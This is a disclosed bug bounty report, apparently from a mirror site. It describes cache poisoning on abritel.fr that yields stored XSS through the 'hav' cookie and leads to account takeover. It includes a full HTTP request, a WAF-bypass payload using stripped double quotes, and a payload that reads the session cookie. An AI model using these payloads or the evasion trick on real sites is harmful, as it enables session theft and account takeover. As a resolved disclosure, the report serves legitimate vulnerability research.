Loading HuntDB...

Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover)

High
E
Expedia Group Bug Bounty
Submitted None
Reported by bombon

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
## Summary: Report #1698316 was closed as resolved You told me that the stored XSS was going to be resolved since "As this relies on the same root cause, we will be closing it as duplicate", but no abritel.fr has a strong WAF, however the server hides double quotes, allowing to bypass the WAF e.g The server blocks `</script`but if I send `</sc"ript>` WAF is bypassed and the output is </script> ## Steps To Reproduce: 1-> Send this request ```http GET /annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js?xxxd HTTP/2 Host: www.abritel.fr Cookie: hav=xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.abritel.fr/signup?enable_registration=true&redirectTo=%2Fsearch%2Fkeywords%3Asoissons-france-%28xss%29%2FminNightlyPrice%2F0%3FpetIncluded%3Dfalse%26filterByTotalPrice%3Dtrue%26ssr%3Dtrue&referrer_page_location=serp Upgrade-Insecure-Requests: 1 Te: trailers ``` 2-> Using another browser visit: https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.jpeg?xxxd Exploit: This is the payload to extract the HASESSIONV3 xss"</sc"ript><sv"g/onloa"d=aler"t"(window.INITIAL_STATE.system.cookie)> ## Supporting Material/References: {F2016192} ## Impact Stored XSS to Account Takeover

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Stored